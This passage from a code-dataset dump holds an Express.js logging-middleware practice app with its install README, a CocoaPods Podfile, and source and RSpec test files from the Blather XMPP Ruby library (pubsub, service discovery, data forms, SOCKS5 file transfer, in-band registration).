})
// Create one todo.
app.post('/', (req, res) => {
  res.send('新增一筆 Todo')
})
// Start the HTTP server.
app.listen(PORT, () => {
  console.log(`App is running on port ${PORT}`)
})
// Reference
// https://codesource.io/creating-a-logging-middleware-in-expressjs/<file_sep>/README.md
# Middleware Practice
Create a middleware to log the request info from browser.
## Function List
When server gets a request, print below info in server log
- time-stamps, local Taipei time
- HTTP request method
- URL
- request duration in milliseconds (ms)
## Environment SetUp
[Express.js](https://expressjs.com/)
## Install - 安裝流程
1. 開啟終端機(Terminal),cd 到存放專案本機位置並執行:
```
git clone https://github.com/rubytsaitw/middleware-practice
```
2. 進入專案資料夾
```
cd middleware-practice
```
3. 安裝 npm 套件
```
npm install
```
4. 安裝 nodemon 套件 (若未安裝)
```
npm install -g nodemon
```
5. 啟動伺服器,執行 app.js 檔案
```
npm run start
```
6. 當 terminal 出現以下字樣,表示啟動完成
```
The Express server is running on http://localhost:5000
```
請至[http://localhost:5000](http://localhost:5000)開始使用程式
## Contributor - 專案開發人員
> [<NAME>](https://github.com/rubytsaitw) | c16c8145bd461699fe126c2b1c1e53eee1730c87 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | rubytsaitw/middleware-practice | 0f248840dfe2a12d624be10d84b2994d4833145e | 2ee1b4b18ea3ee98e4a5adbc1149040a5c3dca8a |
refs/heads/master | <repo_name>mixiu7992/ViewRow<file_sep>/Podfile
platform :ios, '10.0'
source 'https://github.com/CocoaPods/Specs.git'
target 'Example' do
use_frameworks!
pod 'Eureka', '>= 4.3.0'
pod 'SwiftChart'
end
| 6d11fefdda7c443ee3d0478011410e50107538c4 | [
"Ruby"
] | 1 | Ruby | mixiu7992/ViewRow | b40ac19ddd08f87b252a4aece1722edbcabfbdd4 | 6c9feefb09af540d6d7bbbbab89bdc96807baf75 |
refs/heads/develop | <repo_name>adhearsion/blather<file_sep>/lib/blather/errors/sasl_error.rb
module Blather
  # General SASL Errors
  #
  # The specific error condition is available via #name
  #
  # @handler :sasl_error
  class SASLError < BlatherError
    # XML namespace that carries the SASL error condition element
    # @private
    SASL_ERR_NS = 'urn:ietf:params:xml:ns:xmpp-sasl'

    class_attribute :err_name

    # @private
    @@registrations = {}

    register :sasl_error

    # Import an error stanza
    #
    # @param [Blather::XMPPNode] node the error node
    # @return [Blather::SASLError]
    def self.import(node)
      new node
    end

    # Create a new SASLError wrapping the given node
    #
    # @param [Blather::XMPPNode] node the error node
    def initialize(node)
      super()
      @node = node
    end

    # The actual error name, derived from the first element in the
    # SASL namespace (dashes become underscores)
    #
    # @return [Symbol, nil] a symbol representing the error name
    def name
      return unless @node
      condition = @node.find_first('ns:*', :ns => SASL_ERR_NS)
      condition.element_name.tr('-', '_').to_sym
    end
  end # SASLError
end # Blather
<file_sep>/spec/blather/stanza/pubsub/subscriptions_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
# Expected subscription list matching the subscriptions_xml fixture,
# keyed by subscription state.
def control_subscriptions
  subscribed = [
    { :node => 'node1', :jid => '<EMAIL>', :subid => 'fd8237yr872h3f289j2' },
    { :node => 'node2', :jid => '<EMAIL>', :subid => 'h8394hf8923ju' }
  ]
  {
    :subscribed   => subscribed,
    :unconfigured => [{ :node => 'node3', :jid => '<EMAIL>' }],
    :pending      => [{ :node => 'node4', :jid => '<EMAIL>' }],
    :none         => [{ :node => 'node5', :jid => '<EMAIL>' }]
  }
end
# Specs for Blather::Stanza::PubSub::Subscriptions: registration, import,
# presence/uniqueness of the <subscriptions/> child, defaults, and parsing
# of a subscriptions result into the control_subscriptions structure.
describe Blather::Stanza::PubSub::Subscriptions do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:subscriptions, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Subscriptions)
  end

  it 'can be imported' do
    expect(Blather::XMPPNode.parse(subscriptions_xml)).to be_instance_of Blather::Stanza::PubSub::Subscriptions
  end

  it 'ensures an subscriptions node is present on create' do
    subscriptions = Blather::Stanza::PubSub::Subscriptions.new
    expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'ensures an subscriptions node exists when calling #subscriptions' do
    subscriptions = Blather::Stanza::PubSub::Subscriptions.new
    # remove the child so the accessor has to recreate it
    subscriptions.pubsub.remove_children :subscriptions
    expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty

    expect(subscriptions.subscriptions).not_to be_nil
    expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'ensures the subscriptions node is not duplicated when calling #subscriptions' do
    subscriptions = Blather::Stanza::PubSub::Subscriptions.new
    subscriptions.pubsub.remove_children :subscriptions
    expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty

    # repeated accessor calls must still yield exactly one child node
    5.times { subscriptions.subscriptions }
    expect(subscriptions.find('//ns:pubsub/ns:subscriptions', :ns => Blather::Stanza::PubSub.registered_ns).count).to eq(1)
  end

  it 'defaults to a get node' do
    aff = Blather::Stanza::PubSub::Subscriptions.new
    expect(aff.type).to eq(:get)
  end

  it 'sets the host if requested' do
    aff = Blather::Stanza::PubSub::Subscriptions.new :get, 'pubsub.jabber.local'
    expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'can import a subscriptions result node' do
    node = parse_stanza(subscriptions_xml).root
    subscriptions = Blather::Stanza::PubSub::Subscriptions.new.inherit node
    expect(subscriptions.size).to eq(4)
    expect(subscriptions.list).to eq(control_subscriptions)
  end

  it 'will iterate over each subscription' do
    node = parse_stanza(subscriptions_xml).root
    subscriptions = Blather::Stanza::PubSub::Subscriptions.new.inherit node
    subscriptions.each do |type, nodes|
      expect(nodes).to eq(control_subscriptions[type])
    end
  end
end
<file_sep>/spec/blather/stanza/pubsub/items_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
# Specs for Blather::Stanza::PubSub::Items: registration, import,
# presence of the <items/> child, defaults, iteration, and the
# Items.request builder (all items / specific ids / max_items).
describe Blather::Stanza::PubSub::Items do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:items, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Items)
  end

  it 'can be imported' do
    expect(Blather::XMPPNode.parse(items_all_nodes_xml)).to be_instance_of Blather::Stanza::PubSub::Items
  end

  it 'ensures an items node is present on create' do
    items = Blather::Stanza::PubSub::Items.new
    expect(items.find('//ns:pubsub/ns:items', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'ensures an items node exists when calling #items' do
    items = Blather::Stanza::PubSub::Items.new
    # remove the child so the accessor has to recreate it
    items.pubsub.remove_children :items
    expect(items.find('//ns:pubsub/ns:items', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty

    expect(items.items).not_to be_nil
    expect(items.find('//ns:pubsub/ns:items', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'defaults to a get node' do
    aff = Blather::Stanza::PubSub::Items.new
    expect(aff.type).to eq(:get)
  end

  it 'ensures newly inherited items are PubSubItem objects' do
    items = Blather::XMPPNode.parse(items_all_nodes_xml)
    expect(items.map { |i| i.class }.uniq).to eq([Blather::Stanza::PubSub::PubSubItem])
  end

  it 'will iterate over each item' do
    n = parse_stanza items_all_nodes_xml
    items = Blather::Stanza::PubSub::Items.new.inherit n.root
    count = 0
    items.each { |i| expect(i).to be_instance_of Blather::Stanza::PubSub::PubSubItem; count += 1 }
    expect(count).to eq(4)
  end

  it 'can create an items request node to request all items' do
    host = 'pubsub.jabber.local'
    node = 'princely_musings'

    items = Blather::Stanza::PubSub::Items.request host, node
    expect(items.find("//ns:items[@node=\"#{node}\"]", :ns => Blather::Stanza::PubSub.registered_ns).size).to eq(1)
    expect(items.to).to eq(Blather::JID.new(host))
    expect(items.node).to eq(node)
  end

  it 'can create an items request node to request some items' do
    host = 'pubsub.jabber.local'
    node = 'princely_musings'
    items = %w[item1 item2]
    # build an XPath predicate matching any of the requested item ids
    items_xpath = items.map { |i| "@id=\"#{i}\"" } * ' or '

    items = Blather::Stanza::PubSub::Items.request host, node, items
    expect(items.find("//ns:items[@node=\"#{node}\"]/ns:item[#{items_xpath}]", :ns => Blather::Stanza::PubSub.registered_ns).size).to eq(2)
    expect(items.to).to eq(Blather::JID.new(host))
    expect(items.node).to eq(node)
  end

  it 'can create an items request node to request "max_number" of items' do
    host = 'pubsub.jabber.local'
    node = 'princely_musings'
    max = 3

    items = Blather::Stanza::PubSub::Items.request host, node, nil, max
    expect(items.find("//ns:pubsub/ns:items[@node=\"#{node}\" and @max_items=\"#{max}\"]", :ns => Blather::Stanza::PubSub.registered_ns).size).to eq(1)
    expect(items.to).to eq(Blather::JID.new(host))
    expect(items.node).to eq(node)
    expect(items.max_items).to eq(max)
  end
end
<file_sep>/lib/blather/stanza/disco/disco_info.rb
module Blather
  class Stanza
    # # DiscoInfo Stanza
    #
    # [XEP-0030 Disco Info](http://xmpp.org/extensions/xep-0030.html#info)
    #
    # Disco Info node that provides or retrieves information about a jabber entity
    #
    # @handler :disco_info
    class DiscoInfo < Disco
      register :disco_info, nil, 'http://jabber.org/protocol/disco#info'

      # Create a new DiscoInfo stanza
      # @param [:get, :set, :result, :error, nil] type the Iq stanza type
      # @param [String, nil] node the name of the node the info belongs to
      # @param [Array<Array, DiscoInfo::Identity>, nil] identities a list of
      #   identities. these are passed directly to DiscoInfo::Identity.new
      # @param [Array<Array, DiscoInfo::Feature>, nil] features a list of
      #   features. these are passed directly to DiscoInfo::Feature.new
      # @return [DiscoInfo] a new DiscoInfo stanza
      def self.new(type = nil, node = nil, identities = [], features = [])
        new_node = super type
        new_node.node = node
        # wrapped in an array here; the setters flatten, so single items,
        # arrays and nil are all accepted
        new_node.identities = [identities]
        new_node.features = [features]
        new_node
      end

      # List of identity objects
      #
      # NOTE(review): the '//' XPath searches from the document root, not
      # just this query element — presumably safe for a single-query Iq;
      # confirm before reuse elsewhere.
      def identities
        query.find('//ns:identity', :ns => self.class.registered_ns).map do |i|
          Identity.new i
        end
      end

      # Replace the set of identities (existing ones are removed first)
      # @param identities the array of identities, passed directly to Identity.new
      def identities=(identities)
        query.find('//ns:identity', :ns => self.class.registered_ns).each &:remove
        if identities
          [identities].flatten.each { |i| self.query << Identity.new(i) }
        end
      end

      # List of feature objects
      def features
        query.find('//ns:feature', :ns => self.class.registered_ns).map do |f|
          Feature.new f
        end
      end

      # Replace the set of features (existing ones are removed first)
      # @param features the array of features, passed directly to Feature.new
      def features=(features)
        query.find('//ns:feature', :ns => self.class.registered_ns).each &:remove
        if features
          [features].flatten.each { |f| self.query << Feature.new(f) }
        end
      end

      # Compare two DiscoInfo objects, additionally considering their
      # identities and features
      # @param [DiscoInfo] o the DiscoInfo object to compare against
      # @return [true, false]
      def eql?(o, *fields)
        super o, *(fields + [:identities, :features])
      end

      # DiscoInfo::Identity
      class Identity < XMPPNode
        # Create a new DiscoInfo::Identity
        # @overload new(node)
        #   Imports the XML::Node to create a Identity object
        #   @param [XML::Node] node the node object to import
        # @overload new(opts = {})
        #   Creates a new Identity using a hash of options
        #   @param [Hash] opts a hash of options
        #   @option opts [String] :name the name of the identity
        #   @option opts [String] :type the type of the identity
        #   @option opts [String] :category the category of the identity
        #   @option opts [String] :xml_lang the xml:lang of the identity
        # @overload new(name, type = nil, category = nil, xml_lang = nil)
        #   Create a new Identity by name
        #   @param [String] name the name of the Identity
        #   @param [String, nil] type the type of the Identity
        #   @param [String, nil] category the category of the Identity
        #   @param [String, nil] xml_lang the xml:lang of the Identity
        def self.new(name, type = nil, category = nil, xml_lang = nil)
          return name if name.class == self
          new_node = super :identity

          case name
          when Nokogiri::XML::Node
            new_node.inherit name
          when Hash
            new_node.name = name[:name]
            new_node.type = name[:type]
            new_node.category = name[:category]
            new_node.xml_lang = name[:xml_lang]
          else
            new_node.name = name
            new_node.type = type
            new_node.category = category
            new_node.xml_lang = xml_lang
          end
          new_node
        end

        # The Identity's category
        # @return [Symbol, nil]
        def category
          read_attr :category, :to_sym
        end

        # Set the Identity's category
        # @param [String, Symbol] category the new category
        def category=(category)
          write_attr :category, category
        end

        # The Identity's type
        # @return [Symbol, nil]
        def type
          read_attr :type, :to_sym
        end

        # Set the Identity's type
        # @param [String, Symbol] type the new category
        def type=(type)
          write_attr :type, type
        end

        # The Identity's name
        # @return [String]
        def name
          read_attr :name
        end

        # Set the Identity's name
        # @param [String] name the new name for the identity
        def name=(name)
          write_attr :name, name
        end

        # The Identity's xml:lang
        # @return [String]
        def xml_lang
          read_attr "xml:lang"
        end

        # Set the Identity's xml:lang
        # @param [String] xml_lang the new language for the identity
        def xml_lang=(xml_lang)
          write_attr "xml:lang", xml_lang
        end

        # Compare two Identity objects by name, type, category and xml:lang
        # @param [DiscoInfo::Identity] o the Identity object to compare against
        # @return [true, false]
        def eql?(o, *fields)
          super o, *(fields + [:name, :type, :category, :xml_lang])
        end
      end # Identity

      # DiscoInfo::Feature
      class Feature < XMPPNode
        # Create a new DiscoInfo::Feature object
        # @overload new(node)
        #   Create a new Feature by importing an XML::Node
        #   @param [XML::Node] node an XML::Node to import
        # @overload new(var)
        #   Create a new feature by var
        #   @param [String] var a the Feautre's var
        # @return [DiscoInfo::Feature]
        def self.new(var)
          return var if var.class == self
          new_node = super :feature
          case var
          when Nokogiri::XML::Node
            new_node.inherit var
          else
            new_node.var = var
          end
          new_node
        end

        # The Feature's var
        # @return [String]
        def var
          read_attr :var
        end

        # Set the Feature's var
        # @param [String] var the new var
        def var=(var)
          write_attr :var, var
        end

        # Compare two DiscoInfo::Feature objects by var
        # @param [DiscoInfo::Feature] o the Feature object to compare against
        # @return [true, false]
        def eql?(o, *fields)
          super o, *(fields + [:var])
        end
      end # Feature
    end # DiscoInfo
  end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/x.rb
module Blather
  class Stanza
    # # X Stanza
    #
    # [XEP-0004 Data Forms](http://xmpp.org/extensions/xep-0004.html)
    #
    # Data Form node that allows for semi-structured data exchange
    #
    # @handler :x
    class X < XMPPNode
      register :x, 'jabber:x:data'

      # @private
      VALID_TYPES = [:cancel, :form, :result, :submit].freeze

      # Create a new X node
      # @param [:cancel, :form, :result, :submit, nil] type the x:form type
      # @param [Array<Array, X::Field>, nil] fields a list of fields.
      #   These are passed directly to X::Field.new
      # @return [X] a new X stanza
      def self.new(type = nil, fields = [])
        new_node = super :x

        case type
        when Nokogiri::XML::Node
          new_node.inherit type
        when Hash
          new_node.type = type[:type]
          new_node.fields = type[:fields]
        else
          new_node.type = type
          new_node.fields = fields
        end
        new_node
      end

      # Find the X node on the parent or create a new one
      #
      # If an x child already exists it is detached from the parent and
      # re-appended (wrapped in this class) so the return value is always
      # a direct child of `parent`.
      #
      # @param [Blather::Stanza] parent the parent node to search under
      # @return [Blather::Stanza::X]
      def self.find_or_create(parent)
        if found_x = parent.find_first('ns:x', :ns => self.registered_ns)
          x = self.new found_x
          found_x.remove
        else
          x = self.new
        end
        parent << x
        x
      end

      # The Form's type
      # @return [Symbol]
      def type
        read_attr :type, :to_sym
      end

      # Set the Form's type
      # @param [:cancel, :form, :result, :submit] type the new type for the form
      # @raise [ArgumentError] if the type is not one of VALID_TYPES
      def type=(type)
        if type && !VALID_TYPES.include?(type.to_sym)
          raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
        end
        write_attr :type, type
      end

      # List of field objects
      # @return [Blather::Stanza::X::Field]
      def fields
        self.find('ns:field', :ns => self.class.registered_ns).map do |field|
          Field.new(field)
        end
      end

      # Find a field by var
      # @param var the var for the field you wish to find
      def field(var)
        fields.detect { |f| f.var == var }
      end

      # Replace the form's fields (existing ones are removed first)
      # @param fields the array of fields, passed directly to Field.new
      def fields=(fields)
        remove_children :field
        [fields].flatten.each do |field|
          self << (f = Field.new(field))
          # new fields must share the form's namespace so XPath lookups find them
          f.namespace = self.namespace
        end
      end

      # Check if the x is of type :cancel
      #
      # @return [true, false]
      def cancel?
        self.type == :cancel
      end

      # Check if the x is of type :form
      #
      # @return [true, false]
      def form?
        self.type == :form
      end

      # Check if the x is of type :result
      #
      # @return [true, false]
      def result?
        self.type == :result
      end

      # Check if the x is of type :submit
      #
      # @return [true, false]
      def submit?
        self.type == :submit
      end

      # Retrieve the form's instructions
      #
      # @return [String]
      def instructions
        content_from 'ns:instructions', :ns => self.registered_ns
      end

      # Set the form's instructions
      #
      # @param [String] instructions the form's instructions
      def instructions=(instructions)
        self.remove_children :instructions
        if instructions
          self << (i = XMPPNode.new(:instructions, self.document))
          i.namespace = self.namespace
          i.content = instructions
        end
      end

      # Retrieve the form's title
      #
      # @return [String]
      def title
        content_from 'ns:title', :ns => self.registered_ns
      end

      # Set the form's title
      #
      # @param [String] title the form's title
      def title=(title)
        self.remove_children :title
        if title
          self << (t = XMPPNode.new(:title))
          t.namespace = self.namespace
          t.content = title
        end
      end

      # Field stanza fragment
      class Field < XMPPNode
        register :field, 'jabber:x:data'
        # @private
        VALID_TYPES = [:boolean, :fixed, :hidden, :"jid-multi", :"jid-single", :"list-multi", :"list-single", :"text-multi", :"text-private", :"text-single"].freeze

        # Create a new X Field
        # @overload new(node)
        #   Imports the XML::Node to create a Field object
        #   @param [XML::Node] node the node object to import
        # @overload new(opts = {})
        #   Creates a new Field using a hash of options
        #   @param [Hash] opts a hash of options
        #   @option opts [String] :var the variable for the field
        #   @option opts [:boolean, :fixed, :hidden, :"jid-multi", :"jid-single", :"list-multi", :"list-single", :"text-multi", :"text-private", :"text-single"] :type the type of the field
        #   @option opts [String] :label the label for the field
        #   @option opts [String, nil] :value the value for the field
        #   @option opts [String, nil] :description the description for the field
        #   @option opts [true, false, nil] :required the required flag for the field
        #   @option opts [Array<Array, X::Field::Option>, nil] :options a list of field options.
        #     These are passed directly to X::Field::Option.new
        # @overload new(var, type = nil, label = nil, value = nil, description = nil, required = false, options = [])
        #   Create a new Field by name
        #   @param [String, nil] var the variable for the field
        #   @param [:boolean, :fixed, :hidden, :"jid-multi", :"jid-single", :"list-multi", :"list-single", :"text-multi", :"text-private", :"text-single"] type the type of the field
        #   @param [String, nil] label the label for the field
        #   @param [String, nil] value the value for the field
        #   @param [String, nil] description the description for the field
        #   @param [true, false, nil] required the required flag for the field
        #   @param [Array<Array, X::Field::Option>, nil] options a list of field options.
        #     These are passed directly to X::Field::Option.new
        def self.new(var, type = nil, label = nil, value = nil, description = nil, required = false, options = [])
          new_node = super :field

          case var
          when Nokogiri::XML::Node
            new_node.inherit var
          when Hash
            new_node.var = var[:var]
            new_node.type = var[:type]
            new_node.label = var[:label]
            new_node.value = var[:value]
            new_node.desc = var[:description]
            new_node.required = var[:required]
            new_node.options = var[:options]
          else
            new_node.var = var
            new_node.type = type
            new_node.label = label
            new_node.value = value
            new_node.desc = description
            new_node.required = required
            new_node.options = options
          end
          new_node
        end

        # The Field's type
        # @return [String]
        def type
          read_attr :type
        end

        # Set the Field's type
        # @param [#to_sym] type the new type for the field
        # @raise [ArgumentError] if the type is not one of VALID_TYPES
        def type=(type)
          if type && !VALID_TYPES.include?(type.to_sym)
            raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
          end
          write_attr :type, type
        end

        # The Field's var
        # @return [String]
        def var
          read_attr :var
        end

        # Set the Field's var
        # @param [String] var the new var for the field
        def var=(var)
          write_attr :var, var
        end

        # The Field's label
        # @return [String]
        def label
          read_attr :label
        end

        # Set the Field's label
        # @param [String] label the new label for the field
        def label=(label)
          write_attr :label, label
        end

        # Get the field's value
        #
        # Returns a single string when there are zero or one value
        # children, an array of strings when there are several.
        #
        # @return [String, Array<String>, nil]
        def value
          children = if self.namespace
            xpath('ns:value', ns: self.namespace.href)
          else
            xpath(:value)
          end
          return children.first&.content if children.length < 2
          children.map(&:content)
        end

        # Set the field's value
        #
        # @param [String, Array] value one or more values for the field
        def value=(value)
          self.remove_children :value
          return unless value

          Array(value).each do |val|
            self << (v = XMPPNode.new(:value))
            v.namespace = self.namespace
            v.content = val
          end
        end

        # Get the field's description
        #
        # @return [String]
        def desc
          if self.namespace
            content_from 'ns:desc', :ns => self.namespace.href
          else
            content_from :desc
          end
        end

        # Set the field's description
        #
        # @param [String] description the field's description
        def desc=(description)
          self.remove_children :desc
          if description
            self << (d = XMPPNode.new(:desc))
            d.namespace = self.namespace
            d << description
          end
        end

        # Get the field's required flag
        #
        # @return [true, false]
        def required?
          !!if self.namespace
            self.find_first 'ns:required', :ns => self.namespace.href
          else
            self.find_first 'required'
          end
        end

        # Set the field's required flag
        #
        # @param [true, false] required the field's required flag
        def required=(required)
          return self.remove_children(:required) unless required
          self << (r = XMPPNode.new(:required))
          r.namespace = self.namespace
        end

        # Extract list of option objects
        #
        # @return [Blather::Stanza::X::Field::Option]
        def options
          if self.namespace
            self.find('ns:option', :ns => self.namespace.href)
          else
            self.find('option')
          end.map { |f| Option.new(f) }
        end

        # Replace the field's options (existing ones are removed first)
        # @param options the array of options, passed directly to Option.new
        def options=(options)
          remove_children :option
          if options
            Array(options).each { |o| self << Option.new(o) }
          end
        end

        # Compare two Field objects by type, var, label, desc, required and value
        # @param [X::Field] o the Field object to compare against
        # @return [true, false]
        def eql?(o, *fields)
          super o, *(fields + [:type, :var, :label, :desc, :required?, :value])
        end

        # Option stanza fragment
        class Option < XMPPNode
          register :option, 'jabber:x:data'

          # Create a new X Field Option
          # @overload new(node)
          #   Imports the XML::Node to create a Field option object
          #   @param [XML::Node] node the node object to import
          # @overload new(opts = {})
          #   Creates a new Field option using a hash of options
          #   @param [Hash] opts a hash of options
          #   @option opts [String] :value the value of the field option
          #   @option opts [String] :label the human readable label for the field option
          # @overload new(value, label = nil)
          #   Create a new Field option by name
          #   @param [String] value the value of the field option
          #   @param [String, nil] label the human readable label for the field option
          def self.new(value, label = nil)
            new_node = super :option

            case value
            when Nokogiri::XML::Node
              new_node.inherit value
            when Hash
              new_node.value = value[:value]
              new_node.label = value[:label]
            else
              new_node.value = value
              new_node.label = label
            end
            new_node
          end

          # The Field Option's value
          # @return [String]
          def value
            if self.namespace
              content_from 'ns:value', :ns => self.namespace.href
            else
              content_from :value
            end
          end

          # Set the Field Option's value
          # @param [String] value the new value for the field option
          def value=(value)
            self.remove_children :value
            if value
              self << (v = XMPPNode.new(:value))
              v.namespace = self.namespace
              v << value
            end
          end

          # The Field Option's label
          # @return [String]
          def label
            read_attr :label
          end

          # Set the Field Option's label
          # @param [String] label the new label for the field option
          def label=(label)
            write_attr :label, label
          end
        end # Option
      end # Field
    end # X
  end # Stanza
end # Blather
<file_sep>/lib/blather/file_transfer/s5b.rb
module Blather
  class FileTransfer
    # SOCKS5 Bytestreams Transfer helper
    # Takes care of accepting, declining and offering file transfers through the stream
    class S5b
      # Set this to false if you don't want to fallback to In-Band Bytestreams
      attr_accessor :allow_ibb_fallback

      # Set this to true if the buddies of your bot will be in the same local network
      #
      # Usually IM clients advertise all network addresses which they can determine.
      # Skipping the local ones can save time if your bot is not in the same local network as it's buddies
      attr_accessor :allow_private_ips

      # @param [Blather::Stream] stream the stream the transfer arrived on
      # @param [Blather::Stanza::Iq] iq the streamhost-offer iq being handled
      def initialize(stream, iq)
        @stream = stream
        @iq = iq
        @allow_ibb_fallback = true
        @allow_private_ips = false
      end

      # Accept an incoming file-transfer
      #
      # @param [module] handler the handler for incoming data, see Blather::FileTransfer::SimpleFileReceiver for an example
      # @param [Array] params the params to be passed into the handler
      def accept(handler, *params)
        @streamhosts = @iq.streamhosts
        # drop streamhosts with private addresses unless explicitly allowed;
        # hosts whose address fails to parse are kept (rescue => false)
        @streamhosts.delete_if {|s| begin IPAddr.new(s.host).private? rescue false end } unless @allow_private_ips
        # SOCKS5 destination address: SHA1 of sid + requester JID + target JID
        # (the XEP-0065 DST.ADDR recipe)
        @socket_address = Digest::SHA1.hexdigest("#{@iq.sid}#{@iq.from}#{@iq.to}")
        @handler = handler
        @params = params

        connect_next_streamhost

        @stream.clear_handlers :s5b_open, :from => @iq.from
      end

      # Decline an incoming file-transfer
      def decline
        @stream.clear_handlers :s5b_open, :from => @iq.from
        @stream.write StanzaError.new(@iq, 'not-acceptable', :auth).to_node
      end

      # Offer a file to somebody, not implemented yet
      def offer
        # TODO: implement
      end

      private

      # Try the next advertised streamhost; when none are left, optionally
      # register an IBB fallback handler and report item-not-found for the
      # SOCKS5 offer.
      def connect_next_streamhost
        if streamhost = @streamhosts.shift
          connect(streamhost)
        else
          if @allow_ibb_fallback
            @stream.register_handler :ibb_open, :from => @iq.from, :sid => @iq.sid do |iq|
              transfer = Blather::FileTransfer::Ibb.new(@stream, iq)
              transfer.accept(@handler, *@params)
              true
            end
          end
          # the SOCKS5 offer is refused even when falling back to IBB;
          # the peer is then expected to retry in-band
          @stream.write StanzaError.new(@iq, 'item-not-found', :cancel).to_node
        end
      end

      # Open a SOCKS5 connection to a single streamhost; on success reply
      # with streamhost-used, on failure move on to the next candidate.
      def connect(streamhost)
        begin
          socket = EM.connect streamhost.host, streamhost.port, SocketConnection, @socket_address, 0, @handler, *@params
          socket.callback do
            answer = @iq.reply
            answer.streamhosts = nil
            answer.streamhost_used = streamhost.jid

            @stream.write answer
          end
          socket.errback do
            connect_next_streamhost
          end
        rescue EventMachine::ConnectionError => e
          connect_next_streamhost
        end
      end

      # @private
      class SocketConnection < EM::P::Socks5
        include EM::Deferrable

        def initialize(host, port, handler, *params)
          super(host, port)
          # NOTE(review): @@handler is a class variable shared by every
          # SocketConnection instance — concurrent transfers with different
          # handlers could overwrite each other; confirm this is acceptable.
          @@handler = handler
          @params = params
        end

        # Called by EM::P::Socks5 once the SOCKS handshake completes.
        # Mixes the handler module into this object's singleton class so the
        # handler's methods shadow these, then re-dispatches initialize and
        # post_init to the handler's implementations.
        def post_init
          self.succeed

          class << self
            include @@handler
          end
          send(:initialize, *@params)
          post_init
        end

        # Mark the deferrable failed if the connection dropped before the
        # SOCKS handshake finished.
        def unbind
          self.fail if @socks_state != :connected
        end
      end
    end
  end
end
<file_sep>/lib/blather/stream/features/register.rb
module Blather
  class Stream
    # In-band registration stream feature.
    #
    # Responds to the server's register feature advertisement by submitting
    # the stream's JID node and password as a jabber:iq:register query and
    # succeeding once the server acknowledges it.
    class Register < Features
      REGISTER_NS = "http://jabber.org/features/iq-register".freeze

      register REGISTER_NS

      # @param [Blather::Stream] stream the stream being negotiated
      # @param [Proc] succeed called when registration completes
      # @param [Proc] fail called when registration fails
      def initialize(stream, succeed, fail)
        super
        @jid = @stream.jid
        @pass = @stream.password
      end

      # Handle the next stanza in the registration exchange: fail on an
      # error, succeed on an acknowledging result, otherwise submit the
      # registration query.
      def receive_data(stanza)
        if stanza.xpath("//error").first
          fail! BlatherError.new(stanza)
          return
        end

        acknowledged = stanza['type'] == 'result' &&
                       (stanza.content.empty? ||
                        stanza.children.any? { |child| child.element_name == "query" })

        acknowledged ? succeed! : @stream.send(register_query)
      end

      # Build the jabber:iq:register submission carrying the username
      # (JID node) and password.
      def register_query
        iq = Blather::Stanza::Iq::Query.new(:set)
        query = iq.xpath('//query').first
        query['xmlns'] = 'jabber:iq:register'
        Nokogiri::XML::Builder.with(query) do |xml|
          xml.username @jid.node
          xml.password @pass
        end
        iq
      end
    end
  end
end
<file_sep>/spec/blather/stanza/message_spec.rb
require 'spec_helper'
# Fixture: an iChat-style chat message with an XHTML body whose <html>
# wrapper carries the XHTML namespace (not XHTML-IM), plus Apple
# message-attachment and embedded si file-transfer payloads.
def ichat_message_xml
  <<-XML
  <message from="<EMAIL>/balcony" to="<EMAIL>" type="chat" id="iChat_5FA6C6DC">
    <body>Hello</body>
    <html xmlns="http://www.w3.org/1999/xhtml">
      <body style="background-color:#7bb5ee;color:#000000;">
        <span style="font-family: 'Arial';font-size: 12px;color: #262626;">Hello</span>
        <img alt="f5ad3a04d218d7160fa02415e02d41b3.jpg" src="message-attachments:1" width="30" height="30"/>
      </body>
    </html>
    <x xmlns="http://www.apple.com/xmpp/message-attachments">
      <attachment id="1">
        <sipub xmlns="http://jabber.org/protocol/sipub" from="<EMAIL>/balcony" id="sipubid_77933F62" mime-type="binary/octet-stream" profile="http://jabber.org/protocol/si/profile/file-transfer">
          <file xmlns="http://jabber.org/protocol/si/profile/file-transfer" xmlns:ichat="apple:profile:transfer-extensions" name="f5ad3a04d218d7160fa02415e02d41b3.jpg" size="1245" posixflags="000001A4"/>
        </sipub>
      </attachment>
    </x>
    <iq type="set" id="iChat_4CC32F1F" to="<EMAIL>">
      <si xmlns="http://jabber.org/protocol/si" id="sid_60C2D273" mime-type="binary/octet-stream" profile="http://jabber.org/protocol/si/profile/file-transfer">
        <file xmlns="http://jabber.org/protocol/si/profile/file-transfer" xmlns:ichat="apple:profile:transfer-extensions" name="f5ad3a04d218d7160fa02415e02d41b3.jpg" size="1245" posixflags="000001A4"/>
        <feature xmlns="http://jabber.org/protocol/feature-neg">
          <x xmlns="jabber:x:data" type="form">
            <field type="list-single" var="stream-method">
              <option><value>http://jabber.org/protocol/bytestreams</value></option>
            </field>
          </x>
        </feature>
      </si>
    </iq>
  </message>
  XML
end
# Fixture: a plain chat message carrying a body, a jabber:x:data form
# with one field, and a <paused/> chat-state notification.
def message_xml
  <<-XML
  <message
      to='<EMAIL>'
      from='<EMAIL>/balcony'
      type='chat'
      xml:lang='en'>
    <body>Wherefore art thou, Romeo?</body>
    <x xmlns='jabber:x:data' type='form'>
      <field var='field-name' type='text-single' label='description' />
    </x>
    <paused xmlns="http://jabber.org/protocol/chatstates"/>
